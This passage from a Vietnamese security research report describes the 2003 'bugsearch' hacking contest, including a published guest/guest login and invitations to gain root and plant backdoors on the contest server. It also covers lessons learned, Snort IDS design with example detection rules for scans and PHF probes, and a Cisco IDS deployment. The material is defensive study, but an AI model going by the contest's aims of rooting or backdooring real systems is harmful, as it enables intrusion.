bugsearch nếu hệ thống bị lộ mật khẩu của một tài khỏan, chúng tôi xin công bố một tài khỏan guest với password guest trên máy bugsearch. Các bạn có thể sử dụng tài khỏan này để kết nối vào bugsearch qua ssh và xem xét khả năng lấy root shell, cài Load Kernel Module, cài backdoor lên bugsearch. Thời gian không còn nhiều (cuộc thi được gia hạn tới 18h00 ngày 22/10/2003), hãy cố gắng “Về đích” trong cuộc thi bugsearch này. Chúc các bạn thành công, Nhóm bugsearch Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 47 Diễn biến của cuộc thi bugsearch lần tiếp theo như phản ánh thông qua 3 thông báo của bugsearch. • Ngày 26/9/2003 vào lúc 12h00, cuộc thi được nối lại. Máy bugsearch kết nối vào mạng • Ngày 13/10/2003, được biết một số bạn ngại lộ danh tánh nên chưa tích cực tham gia cuộc thi, chúng tôi đã thay đổi thể lệ nộp bài để cho phép các bạn có thể đang ký kết quả với nickname và email address. Trên thực tế, chúng tôi nhận thấy các bạn tham gia cuộc thi đã không ngần ngại thông báo kết quả cũng như danh tánh của mình khi tấn công thành công. Đồng thời cuộc thi được chính thức gia hạn thêm tới 22/10/2003. • Ngày 18/10/2003 vào lúc 16h00, nhóm đề tài quyết định “mạo hiểm” hơn bằng cách mở một tài khỏan guest với mật khẩu guest cho tất cả mọi người. Thông tin này được chúng tôi thông báo tới một số bạn cụ thể, thông tin trên các diễn đàn của hacker Việtnam, thông báo bởi echip. Việc mạo hiểm này là nhằm thử thách khả năng chống lại việc mất quyền root của bugsearch, trong trường hợp một dịch vụ với quyền hạn chế bị xâm nhập và hacker có được shell cùng quyền của người sử dụng hệ thống. • Tới đúng 18h00 nhóm dự án chấm dứt cuộc thi, cắt server ra khỏi mạng và tiến hành thống kê kết quả, tìm các backdoor có thể • Vào lúc 18h00 ngày 24/10/2003, trước sự chứng kiến của phóng viên tuần báo echip, nhóm dự án tiến hành niêm phong ổ đĩa cứng của bugsearch nhằm bảo đảm việc tìm kiếm các backdoor sau này, nếu có, tại hội thảo về bảo mật hệ thống. • Ngọai trừ giải đặc biệt cho người cài được backdoor mà quản trị mạng không biết chưa được xác định, hiện nay nhóm quản trị đã công nhận 1 giải thuộc về bạn Quang Huy (tự Huyremy), người đầu tiên trong 4 người đã phát hiện sơ hở của chương trình cập nhật danh sách người đăng ký vào web bugsearch và có khả năng thay đổi cơ sở dữ liệu người đang ký của bugsearch. Qua cuộc thi bugsearch chúng tôi rút ra những bài học kinh nghiệm sau: • Thi hacking là một hình thức tốt cho phép chúng ta đánh giá được trình độ, sở trường của các hacker tại một thời điểm. Ví dụ như tại thời điểm của cuộc thi, phần khai thác lỗi lập trình ứng dụng chạy trên server của các hacker là mạnh nhất. • Tổ chức cuộc thi là hình thức cho phép thử thách một cấu hình tốt nhất. Căn cứ trên những thành công xâm nhập cùng với các nhật ký của các hệ thống phát hiện xâm nhập (IDS), chúng ta có thể xác định được mức độ an tòan của một hệ thống nếu chúng ta triển khai. • IDS là một thành phần quan trọng của một hệ thống . Không có IDS khó mà có thể phát hiện sớm, lượng giá được mức độ “quan tâm” của cracker/hacker đối với hệ thống của chúng ta. Từ đó khó mà có được một quan tâm, đầu tư đúng với nhu cầu thực. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 48 • Kinh nghiệm cán bộ đối với việc phân tích các log của IDS là rất quan trọng. Các thông báo về tấn công của IDS nhiều khi không sát với thực tế. Ví dụ như các phêin làm việc nhằm thay đổi cơ sở dữ liệu của Web bugsearch được các hệ thống báo động ở cấp trung bình, thậm trí thấp. • Tổ chức thi hacking một cách bài bản với một web site hấp dẫn là một việc làm tốn kém và vượt quá khả năng của một đơn vị/công ty. Đó là những khó khăn về chuyên môn (phải có đủ chuyên gia ở các lĩnh vực mạng, hệ điều hành, cơ sở dữ liệu, lập trình, lập trình Internet …); khó khăn về tài chính (đường truyền riêng, thiết bị, chi phí giải thưởng..); khó khăn về nhân lực tổ chức theo dõi và khó khăn về thông tin. Do đó, nếu chúng ta muốn có những cuộc thi hacking trong tương lai thì đó phải là sự phối hợp của nhiều đơn vị, công ty và đặc biệt là các nhà cung cấp dịch vụ Internet chuyên nghiệp. Chúng tôi hy vọng rằng cuộc thi bugsearch chỉ là mở đầu cho những cuộc thi/nghiên cứu về bảo mật hệ thống sau này. Đó là một cách làm hiệu quả nhằm nâng cao khả năng bảo vệ của các mạng tin học của chúng ta. 4.6 Hệ thống phát hiện xâm nhập snort trên Linux 4.6.1 GIỚI THIỆU VỀ SNORT Snort là công cụ phát hiện xâm nhập khá phổ biến và được gọi là light-weight Instrution Detection System, với một số đặc tính sau: Hỗ trợ nhiều platform: Linux, OpenBSD, FreeBSD, Solaris, Windows,… I386 Sparc M68k/PPC Alpha Other X X X X X Linux X X X OpenBSD X X FreeBSD X X NetBSD X X Solaris X SunOS 4.1.X X HP-UX X AIX X IRIX X Tru64 X MacOS X Server X Win32 - (Win9x/NT/2000) - Kích thước tương nhỏ: phiên bản hiện tại 2.0.2 có kích thước 1885220 Bytes. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 49 - Có khả năng phát hiện một số lượng lớn các kiểu thăm dò, xâm nhập khác nhau như : buffer overflow, CGI-attack, dò tìm hệ điều hành, ICMP, virus,… - Phát hiện nhanh các xâm nhập theo thời gian thực. - Cung cấp cho nhà quản trị các thông tin cần thiết để xử lý các sự cố khi bị xâm nhập - Giúp người quản trị tự đặt ra các dấu hiệu xâm nhập mới một cách dễ dàng. - Là phần mềm Open Source và không tốn kém chi phí đầu tư. 4.6.2 CƠ SỞ THIẾT KẾ SNORT Snort được xây dựng với mục đích thoả mãn các tính năng cơ bản sau: Có hiệu năng cao, đơn giản và có tính uyển chuyển cao. Ba thành phần chính của Snort gồm có: hệ thống packet decoder, hệ thống detection engine và hệ thống logging & alerting. Ba thành phần này dựa trên cơ sở của thư viện LIBPCAP, là thư viện cung cấp khả năng lắng nghe và lọc packet trên mạng. Hệ thống Packet decoder: Nhiệm vụ chủ yếu của hệ thống này là phân tích gói dữ liệu thô bắt được trên mạng và phục hồi thành gói dữ liệu hoàn chỉnh ở lớp application, làm input cho hệ thống dectection engine. Quá trình phục hồi gói dữ liệu được tiến hành từ lớp datalink cho tới lớp application theo thứ tự của protocol stack. Vấn đề quan trọng đặt ra cho hệ thống này đó là tốc độ xử lý gói dữ liệu, nếu tốc độ xử lý chậm sẽ làm cho hiệu năng của SNORT giảm sút do “nghe sót”. Hệ thống detection engine SNORT dùng các rules để phát hiện ra các xâm nhập trên mạng. Xem rules sau: alert tcp !172.16.1.0/24 any -> any any (flags: SF; msg: “SYN-FIN Scan”;) Một rules có hai thành phần: Header và Option, Header: alert tcp !172.16.1.0/24 any -> any any Option: (flags: SF; msg: “SYN-FIN Scan”;) Mỗi dấu hiệu xâm nhập sẽ được thể hiện bằng một rule. Vậy SNORT quản lý tập các rules như thế nào ? SNORT dùng cấu trúc dữ liệu sau để quản lý các rules gọi là Chain Headers và Chain Options. Cấu trúc dữ liệu này bao gồm một dãy các Header và mỗi Header sẽ liên kết đến dãy các Option., sở dĩ dưa trên các Header là vì đây là Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 50 thành phần ít thay đổi của những rules được viết cho cùng một kiểu phát hiện xâm nhập và Option là thành phần dễ được sửa đổi nhất. Ví dụ ta có 40 rules được viết cho kiểu thăm dò CGI-BIN, thực chất các rules này có chung IP source, IP đích, port source, port đích, tức là có chung Header. Mỗi packet sẽ được so trùng lần lượt trong các dãy cho đến khi tìm thấy mẫu đầu tiên thì hành động tương ứng sẽ được thực hiện. Hệ thống Logging & alerting Dùng để thông báo cho quản trị mạng và ghi nhận lại các hành động xâm nhập hệ thống. Hiện tại có 3 dạng logging và 5 kiểu alerting. Các dạng logging, được chọn khi chạy SNORT - Dạng decoded: Đây là dạng log thô nhất, cho phép thực hiện nhanh và thích hợp với các chuyên gia - Dạng nhị phân tcpdump: theo dạng tương tự như tcpdump và ghi vào đĩa nhanh chóng, thích hợp với những hệ thống đòi hỏi performance cao. - Dạng cây thư mục IP: Sắp sếp hệ thống log theo cấu trúc cây thư mục IP, dễ hiểu đối với người dùng. Các dạng alerting: Chain Option Content TCP Flags ICMP Codes/types Payload Size Chain Option Content TCP Flags ICMP Codes/types Payload Size Chain Option Content TCP Flags ICMP Codes/types Payload Size Chain Option Content TCP Flags ICMP Codes/types Payload Size Chain Option Content TCP Flags ICMP Codes/types Payload Size Chain Header Source IP Address Destination IP Address Source Port Destination Port Chain Header Source IP Address Destination IP Address Source Port Destination Port Chain Header Source IP Address Destination IP Address Source Port Destination Port Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 51 - ghi alert vào syslog - ghi alert vào trong file text - gửi thông điệp Winpopup dùng chương trình smbclient - full alert: ghi lại thông điệp alert cùng với nội dung gói dữ liệu. - fast alert: chỉ ghi nhận lại header của gói dữ liệu.Cách này thường dùng trong các hệ thống cần performance cao. TẬP LUẬT(RULES) Tập luật của Snort đơn giản để ta hiểu và viết nhưng cũng đủ mạnh để có thể phát hiện tất cả các hành động xâm nhập trên mạng. Có 3 hành động chính được SNORT thực hiện khi so trùng 1 packet với các mẫu trong rules: - pass: loại bỏ packet mà SNORT bắt được - log: tuỳ theo dạng logging được chọn mà packet sẽ được ghi nhận theo dạng đó - alert: sinh ra một alert tùy theo dạng alert được chọn và log toàn bộ packet dùng dạng logging đã chọn. Dạng cơ bản nhất của một rule bao gồm protocol, chiều của gói dữ liệu và port cần quan tâm, không cần đến phần Option: log tcp any any -> 172.16.1.0/24 80 Rule này sẽ log tất cả các gói dữ liệu đi vào mạng 172.16.1.0/24 ở port 80 Một rule khác có chứa Option alert tcp any any -> 172.16.1.0/24 80 (content: "/cgi-bin/phf"; msg: "PHF probe!";) Rule này sẽ phát hiện các truy cập vào dịch vụ PHF trên web server và alert sẽ được tạo ra cùng với việc ghi nhận lại toàn bộ gói dữ liệu. Vùng địa chỉ IP trong các rules được viết dưới dạng CIDR block netmask, các port có thể được xác định riêng lẻ hoặc theo vùng, port bắt đầu và port kết thúc được ngăn cách bởi dấu “:” alert tcp any any -> 172.16.1.0/24 6000:6010 (msg: "X traffic";) Các option phổ biến của SNORT: 1. content: Search the packet payload for the a specified pattern. 2. flags: Test the TCP flags for specified settings. 3. ttl: Check the IP header's time-to-live (TTL) field. 4. itype: Match on the ICMP type field. 5. icode: Match on the ICMP code field. 6. minfrag: Set the threshold value for IP fragment size. Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 52 7. id: Test the IP header for the specified value. 8. ack: Look for a specific TCP header acknowledgement number. 9. seq: Log for a specific TCP header sequence number. 10. logto: Log packets matching the rule to the specified filename. 11. dsize: Match on the size of the packet payload. 12. offset: Modifier for the content option, sets the offset into the packet payload to begin the content search. 13. depth: Modifier for the content option, sets the number of bytes from the start position to search through. 14. msg: Sets the message to be sent when a packet generates an event. THAM KHẢO SNORT có thể chạy tốt trên các platform mà LIBPCAP hổ trợ. Phiên bản mới nhật hiện nay: Snort 2.02 Các thông tin thêm về SNORT có thể tham khảo tại website: Mã nguồn SNORT có thể download tại: Maillink list: Thư viện libpcap: 4.6.3 KẾT QUẢ MÀ SNORT GHI NHẬN ĐƯỢC TRONG CUỘC THI BUGSEARCH Tổng số tấn công ghi nhận từ 54 địa chỉ IP khác nhau. Ghi nhận của snort ít hơn các hệ thống IDS là do triển khai snort bi trục trặc kỹ thuật và muộn hơn các IDS khác trong quá trình thi. Cài đặt phần mềm snort 2.02 trên RedHat Linux 7.1 và kết quả chi tiết mà snort ghi nhận được trình bày ở phụ lục D. 4.7 Triển khai thử nghiệm Cisco IDS cùng một số nhận định 4.7.1 Giới thiệu về Cisco IDS: IDS – Intrusion Detection System – là hệ thống phát hiện sự xâm nhập. IDS gồm có nhiều hệ thống khác nhau, cả hardware và software, chạy được trên các hệ điều hành khác nhau như Unix, Linux, Windows... Cisco IDS là một hệ thống IDS dựa trên nền network (chỉ có tác dụng đối với dữ liệu luân chuyển trên network) do Cisco phát triển. Nguyên lý hoạt động là so sánh dữ liệu thu nhận được với database của hệ thống để phát ra các cảnh báo về sự xâm nhập. Hệ thống bao gồm 2 phần: Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 53 - Sensor platform: là hardware dùng để theo dõi các packets truyền qua mạng theo thời gian thực - Director platform: là software dùng để config, log, và hiển thị các cảnh báo do sensor báo về. Khi phát hiện được sự xâm nhập, Cisco IDS có khả năng: - TCP reset: kill kết nối TCP hiện đang kết nối tới attacker bằng cách gởi TCP reset packet (chỉ có tác dụng với các kết nối TCP, còn UDP không ảnh hưởng) - IP blocking: IDS cập nhật Access Control List trên Router để từ chối tất cả các kết nối đến từ IP của attacker. - IP logging: lưu tất cả IP của attacker vào file log, đây là cách làm thụ động, không ngăn được hacker tiếp tục tấn công hệ thống. Cisco IDS là dòng sản phẩm dẫn đầu trên thị trường về giải pháp theo dõi bảo mật hệ thống. Đây là hệ thống được thiết kế để đáp ứng các yêu cầu ngày càng tăng của công tác bảo mật, bảo vệ hệ thống khỏi các cuộc tấn công từ chối dịch vụ (DoS), phát hiện sự xâm nhập hệ thống, chống lại sự tấn công của các loại sâu (như Code Red và Nimda), cũng như bảo vệ các doanh nghiệp có ứng dụng thương mại điện tử (e-commerce). Hệ thống Cisco IDS triển khai trong cuộc thi bugsearch là Cisco IDS 4210, có cấu hình: CPU Celeron 566MHz, 256MB Ram, OS Unix. Việc sử dụng hệ thống Cisco IDS có lợi hơn so với các hệ thống khác vì các lý do sau: - Database dùng để nhận dạng các cuộc tấn công thường xuyên được Cisco cập nhật - Sản phẩm có độ ổn định cao. - Dễ triển khai. Tuy nhiên, việc sử dụng Cisco IDS có bất lợi là giá thành cao, các phần mềm điều khiển đòi hỏi phải mua bản quyền. 4.7.2 Cách thức triển khai Cisco IDS trong cuộc thi bugsearch: IDS được đặt sau router 26xx, kết nối vào cùng hub với server đích. (theo như sơ đồ) IDS được cấu hình với dịch vụ lắng nghe các gói tin truyền đến IDS. Dùng phần mềm IDS Event Viewer để phân loại kết quả đạt được. Chi tiết việc cài đặt bằng lệnh gì, hình minh họa ta có thể xem ở đây: Tóm lại, việc cài đặt IDS có thể rút gọn theo các bước đơn giản như sau: Upload by Kenhdaihoc.com Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam 54 - Cấu hình IDS: nối monitor, keyboard, mouse vào Cisco IDS sensor để đặt IP cho IDS sensor. Sau đó ta có thể telnet đến IDS sensor thông qua interface int1 (dùng để command và control), hoặc ta có thể vào địa chỉ https://IDS_IP_add để config IDS sensor qua web - Nối IDS vào mạng: trên IDS có 2 interface RJ45: int0 dùng để quan sát tất cả dữ liệu được truyền qua mạng, int1 dùng để điều khiển và cấu hình IDS. Ta nối dây dẫn từ hub (nối đến máy chủ cần được bảo vệ) đến int0. Cần nhớ phải dùng hub để dữ liệu có thể truyền đến IDS sensor, không được dùng switch. Sau đó nối int1 đến máy ta dùng để điều khiển IDS sensor. - Theo dõi các cuộc tấn công: Cisco IDS được cung cấp kèm theo phần mềm Cis